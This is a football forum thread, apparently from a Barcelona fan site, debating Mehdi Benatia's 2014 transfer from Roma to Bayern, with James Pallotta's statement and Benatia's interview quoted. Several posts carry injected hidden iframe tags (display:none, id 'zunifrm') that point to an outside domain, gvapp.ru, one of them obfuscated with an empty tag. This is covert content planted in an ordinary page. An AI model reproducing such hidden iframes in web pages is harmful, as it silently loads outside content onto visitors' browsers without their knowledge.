Mehdi Benatia

I

instinct

Looking forward to ''incompetent board should have gone for him!!!111'' comments

DonAK

President of FC Barcelona
The Roma fans still love him though so I think he'll get a very good reception when he returns to Stadio Olimpico in the CL match against them.

Trickykid

The Roma fans still love him though so I think he'll get a very good reception when he returns to Stadio Olimpico in the CL match against them.
Really? Here, on a Danish forum, they absolutely despise him, calling him a greedy mercenary.

F

Flavia

Statement from James Pallotta:

Mehdi Benatia has obviously continued with his pattern of outright fabrications over the last couple of months. We had a verbal agreement on compensation and a raise back in July in Boston. He personally said to me that he was happy after I told him flat out with no exceptions that we wanted him to stay. Over the following month he lied about wanting to stay and about the details of his compensation to both Rudi Garcia and his teammates. Lying to me was one thing which I can somewhat handle. Lying to Rudi Garcia and his teammates was completely unacceptable to me. I told Walter Sabatini he was becoming a poison and I wanted him gone, and Rudi and Walter agreed. It wasn’t about the money; it was about having character in our locker room. We are in a very sound financial position. As owners of Roma, we make difficult decisions all the time. As a fan of Roma, I am deeply disappointed that one of our players could act this way.

http://www.asroma.it/en/news/statement_by_james_pallotta_september_8/

Wow.

If this is true, I'm now glad he didn't come to Barça.
<iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

DonAK

President of FC Barcelona
Really? Here, on a Danish forum, they absolutely despise him, calling him a greedy mercenary.

Maybe im wrong then :lol:

Although the general perception from friends who are Roma fans and from those I've seen on social networks like Twitter don't seem to hate him, but who knows now though. Would be interesting to see how they react then.

It's strange if Benatia did all that and lied about it now(even though the Roma hierarchy lied to him as well). He has always come across as a through and through professional and a good leader and example to the younger player from his Udinese and short time at Roma.

I

instinct

<iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

I don't think that it would have been possible to sign him for 26-30m in July. Pallotta basically confirms that they didn't want to sell him and he told them that he didn't want to leave. After various incidents the club suddenly wanted him to leave and therefore they accepted a low offer from Bayern who were the only team interested in him after City got Mangala, we got Vermaelen and Mathieu and Chelsea already finished their business.

Cule4life

The Culest

To be fair its not that shocking with players missing trainings to force moves these days. Certainly less shocking that Ney Sr getting 40mn from us. Maybe salary wasnt the only thing at stake here, maybe he wanted to play at a bigger club.

A true mercenary is someone like Tony Kroos....

F

Flavia

I don't think that it would have been possible to sign him for 26-30m in July. Pallotta basically confirms that they didn't want to sell him and he told them that he didn't want to leave. After various incidents the club suddenly wanted him to leave and therefore they accepted a low offer from Bayern who were the only team interested in him after City got Mangala, we got Vermaelen and Mathieu and Chelsea already finished their business.

True, things unfolded afterwards. But still, maybe not signing him was for the best, dodging a bullet if he is like that. Only time will tell. Maybe Lucho's conections at roma also told him something about benatia.

To be fair its not that shocking with players missing trainings to force moves these days. Certainly less shocking that Ney Sr getting 40mn from us. Maybe salary wasnt the only thing at stake here, maybe he wanted to play at a bigger club.

A true mercenary is someone like Tony Kroos....

Missing trainings is different from lying and being two faced. Personal views too, and I'm not sure how to compare that with the fact clubs were willing to give NeySr money. That ship has sailed, anyway.
<iframe src="about<strong></strong>://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

R

Ryu Hayabusa

Statement from James Pallotta:

Mehdi Benatia has obviously continued with his pattern of outright fabrications over the last couple of months. We had a verbal agreement on compensation and a raise back in July in Boston. He personally said to me that he was happy after I told him flat out with no exceptions that we wanted him to stay. Over the following month he lied about wanting to stay and about the details of his compensation to both Rudi Garcia and his teammates. Lying to me was one thing which I can somewhat handle. Lying to Rudi Garcia and his teammates was completely unacceptable to me. I told Walter Sabatini he was becoming a poison and I wanted him gone, and Rudi and Walter agreed. It wasn’t about the money; it was about having character in our locker room. We are in a very sound financial position. As owners of Roma, we make difficult decisions all the time. As a fan of Roma, I am deeply disappointed that one of our players could act this way.

http://www.asroma.it/en/news/statement_by_james_pallotta_september_8/

Wow.

So he basically wanted to play for a better club right now. Well, I've seen a lot worse than that and have no problem with his bevahiour if that was indeed true. He's now a Bayern player and I'm confident he'll perform well for us. That's all there is to it.

So he basically wanted to play for a better club right now. Well, I've seen a lot worse than that and have no problem with his bevahiour if that was indeed true. He's now a Bayern player and I'm confident he'll perform well for us. That's all there is to it.

Agreed. If I were a Bayern fan, I honestly wouldn't give two shits about what he did at Roma. If anything, Bayern were smart to snap him up when Roma wanted him out. Still not changing my position: we should have bought him instead of Vermaelen.

Last edited:

Dave Saves

This is brutal. You can't expect Benatia to not reply to this.

Michael_Jackson_popcorn.gif

I

instinct

I'm sure he will. Bayern fans should actually be happy because they got him for peanuts because of those incidents. :lol:

Cule4life

The Culest
Missing trainings is different from lying and being two faced. Personal views too, and I'm not sure how to compare that with the fact clubs were willing to give NeySr money. That ship has sailed, anyway.

Look at this from his perspective. He is 27 and wants to play at a big club and wants to win as many trophies left in his remaining career. The club is unwilling to sell. Not justifying his actions. Heck newspapers are notorious for exaggerating. Yes he may have been selfish. But lets be honest if we were in his shoes majority will do the same thing.

Peter Odemwingie drove to QPR on deadline day to force a move....
Beckham had a show thrown at him by Fergie...

So not exactly shocking.....

F

Flavia

Look at this from his perspective. He is 27 and wants to play at a big club and wants to win as many trophies left in his remaining career. The club is unwilling to sell. Not justifying his actions. Heck newspapers are notorious for exaggerating. Yes he may have been selfish. But lets be honest if we were in his shoes majority will do the same thing.

Peter Odemwingie drove to QPR on deadline day to force a move....
Beckham had a show thrown at him by Fergie...

So not exactly shocking.....

As I said, personal views. I know some players hit new lows when trying to force a move, but I get shocked by that.

messi2140

6racies Xavi
Uh guys.. Pallota's statement was a reply to what benatia said.

Medhi Benatia has revealed that he rebuffed interest from Manchester City, Chelsea, Barcelona and Real Madrid before joining Bayern Munich from Roma.
The defender, who moved to the Bundesliga champions during the final days of the summer transfer window for around £20 million, said he wanted to win trophies with one of the "four best clubs in the world".
He said he had not considered leaving Roma - where he had spent only a year - until Bayern came along, telling German magazine kicker: "I felt great at Roma right from the beginning.
"We finished second, and all was great for me. I scored five goals and even captained the team. The people trusted me, and I did not think that I'd be leaving Rome.
"But enquiries started coming in during the year, and I discussed them with the sporting director. Walter Sabatini told me that the club essentially wanted to keep me, but that they needed money so they might sell me.
"We then agreed that I would either get an updated contract or that I would join a top club."

Asked about the clubs interested in him, he replied: "Manchester City and Chelsea, but there were also enquiries from Barcelona and Real Madrid," before explaining that Bayern had got in touch when Javi Martinez was ruled out for up to seven months after being injured in the German Super Cup.
"I did not want to miss out on that opportunity when Bayern voiced their interest," he explained. "I perceived the offer as a huge chance, and told Sabatini that I wanted to join Bayern.
"Bayern are one of the top four clubs in the world. They play for every title year in, year out. You don't reject such an offer."
He said the prospect of working with Pep Guardiola had also been a major factor in his decision, adding: "For a player, he is the best coach there is right now. He makes you better."
Benatia is set to return to Rome in the Champions League in mid-October and said: "I was delighted about that draw, even if I know what I have to expect there. Whistles, insults - but that's the way it is

Read more at http://www.espn.co.uk/football/sport/story/341737.html#7iXrLqCj0ZKDQh05.99

Last edited:

Home of Barca Fans